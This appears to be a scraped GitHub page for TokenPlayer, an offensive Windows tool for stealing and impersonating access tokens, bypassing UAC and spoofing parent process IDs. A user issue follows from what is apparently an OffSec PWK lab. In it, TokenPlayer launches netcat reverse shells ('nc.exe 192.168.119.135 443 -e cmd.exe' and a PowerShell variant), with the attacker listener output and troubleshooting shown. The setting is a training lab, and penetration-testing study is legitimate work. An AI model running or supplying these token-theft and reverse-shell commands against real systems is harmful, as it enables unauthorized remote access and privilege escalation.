TokenPlayer

Manipulating and Abusing Windows Access Tokens.

TokenPlayer is just a small tool i made to learn win32 api programming and understand better the access token model of windows.

Features:

Stealing and Impersonating primary tokens.
Impersonating Protected Processes.
Bypassing UAC by using the Token-Duplication method.
Making new tokens for network authentication by providing credentials (similar to runas /netonly) without the need for special rights or elevated context.
Spoof the parent process ID and spawn a process with an alternative parent.
Execute any application with provided parameters under an impersonated context.
Can be used from non-interactive contexts (e.g. reverse shell) by using pipes for parent-child process communication.

Usage:

General options:
  --help                 Display help menu.

Impersonation Options:
  --impersonate          Impersonates the specified pid and spawns a new child
                         process under its context.
  --pid arg              Proccess ID to steal the token from.
  --spawn                Spawns a new command prompt under the context of the
                         stolen token.

Execution Options:
  --exec                 Execute an instance of a specified program under the
                         impersonated context.
  --pid arg              Proccess ID to steal the token from.
  --prog                 The full path to the program to be executed.
  --args                 Optional execution arguments for the specified
                         program.

Make Token Options:
  --maketoken            Create a new process under a set of creds for only
                         network authentication (Similar to runas /netonly).
  --username arg         Username
  --password arg         Password in plaintext format.
  --domain arg           The domain the user belongs, if domain isn't specified
                         the local machine will be used.

UAC Bypass Options:
  --pwnuac               Will try to bypass UAC using the token-duplication
                         method.
  --spawn                Spawns a new elevated prompt.
  --prog arg             The full path to the program to be executed.
  --args arg             Optional execution arguments for the specified
                         program.

Parent Process Spoofing Options:
  --spoofppid            Spawn a new instance of an application with spoofed
                         parent process.
  --ppid arg             The PID of the parent process.
  --prog arg             The full path to the program to be executed.
  --args arg             Optional execution arguments for the specified
                         program.

Usage 1: Token Impersonation

Using same console:

Spawning a new console:

Usage 2: Executing an application (e.g. rev shell)

Usage 3: Make Token

Usage 4: UAC Bypass

Usage 5: PPID Spoofing

Compile Instructions

To compile it yourself you will need to install the boost library, because it uses it for parsing and handling the command line arguments. Also you'll need to specify the external library's folder on the project's settings.

References

stdout issues?

Hi Mr SlickMeister - I encountered your tool, finally got it all compiled (with boost), was able to execute the exe just fine, but then for some reason my stdout was not echoing the command results.

UPDATE: I dont think stdout is the issue anymore, but something with the userprofile and maybe something about the domain user I am switching to "xor\david" not having a local login? After all this troubleshooting, i havent been able to narrow down the cause.

Victim Machine (offsec pwk labs IP:10.11.1.122):

Host Name:                 XOR-APP07
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00429-70000-00000-AA411
Original Install Date:     5/20/2019, 5:01:32 PM
System Boot Time:          9/15/2021, 4:12:49 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~3094 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 3,326 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 4,079 MB
Virtual Memory: In Use:    720 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    xor.com

notepad.exe                   1708 Services                   0      4,032 K Unknown         xor\david 

PS C:\Windows\TEMP> 
./TokenPlayer.exe --pid 1708 --exec --prog C:\\Windows\\System32\\cmd.exe --args "/c C:\Windows\TEMP\nc.exe 192.168.119.135 443 -e cmd.exe"
./TokenPlayer.exe --pid 1708 --exec --prog C:\\Windows\\System32\\cmd.exe --args "/c C:\Windows\TEMP\nc.exe 192.168.119.135 443 -e cmd.exe"
[+]Elevated Context Found
[*]Enabling SeDebugPrivilege
[+]SeDebugPrivilege ENABLED
[+]Target PID: 1708
[+]OpenProcess() succeed!
[+]OpenProcessToken() succeed!
[+]DuplicateTokenEx() succeed!
[+]CreateProcessWithTokenW() succeed!
[+]Proccess spawned with PID: 3148

RESULT ON ATTACKER MACHINE:

> nc -nlvp 443 
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.11.1.122.
Ncat: Connection from 10.11.1.122:49749.
Microsoft Windows [Version 10.0.17763.504]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami

C:\Windows\system32>

C:\Windows\system32>^C

Same result with netcat traditional

I can change directories with the proper output:

C:\Windows\system32>cd ..
cd ..

C:\Windows>cd ..
cd ..

C:\>

I believe the commands are being executed, just not reflected to the screen...weird

ATTACKER:

C:\>echo test > test.txt
echo test > test.txt

C:\>

VICTIM:

    Directory: C:\


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        9/15/2018  12:19 AM                PerfLogs                                                              
d-r---       12/13/2019   6:35 AM                Program Files                                                         
d-----        9/15/2018   2:08 AM                Program Files (x86)                                                   
d-r---       12/28/2021   6:50 PM                Users                                                                 
d-----       12/28/2021   3:52 PM                Windows                                                               
-a----       12/28/2021   6:57 PM              7 test.txt                                                              


cat test.txt
cat test.txt
test 
PS C:\> 

subsequent shells (those spawned from the new process with the impersonated tokens) are treated this way.

UPDATE: I've seemingly narrowed the issues down to 'whoami' and invoking a powershell prompt.
whoami - does not work

echo %USERNAME%
david

^this does.

Also I am unable to either switch to a powershell prompt or invoke the prompt via netcat.

netcat:
./TokenPlayer.exe --pid 2156 --exec --prog C:\\Windows\\System32\\cmd.exe --args "/c C:\Windows\TEMP\nc.exe 192.168.119.135 443 -e C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

> rlwrap nc -nlvp 443
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.11.1.122.
Ncat: Connection from 10.11.1.122:49727.

^ then the connection drops

When i catch a standard command prompt and try to switch to powershell, the session does not drop, it just doesnt do anything

Victim:

pwd

Path           
----           
C:\windows\temp



PS C:\windows\temp>

Attacker:

> rlwrap nc -nlvp 443
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.11.1.122.
Ncat: Connection from 10.11.1.122:49729.
Microsoft Windows [Version 10.0.17763.504]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32>

C:\Windows\system32>

powershell.exe
powershell.exe

C:\Windows\system32>

pwd
pwd
'pwd' is not recognized as an internal or external command,
operable program or batch file.

powershell -c pwd
powershell -c pwd

C:\Windows\system32>

C:\Windows\system32>

ANOTHER UPDATE:

C:\windows\temp\sche.ps1
Not enough memory resources are available to process this command.

I dont quite understand how this would be related, but I dont get this error normally

s1ckb0y1337 / tokenplayer Goto Github PK

tokenplayer's Introduction

TokenPlayer

Features:

Usage:

Usage 1: Token Impersonation

Using same console:

Spawning a new console:

Usage 2: Executing an application (e.g. rev shell)

Usage 3: Make Token

Usage 4: UAC Bypass

Usage 5: PPID Spoofing

Compile Instructions

References

tokenplayer's People

Contributors

Stargazers

Watchers

Forkers

tokenplayer's Issues

Recommend Projects

Recommend Topics

Recommend Org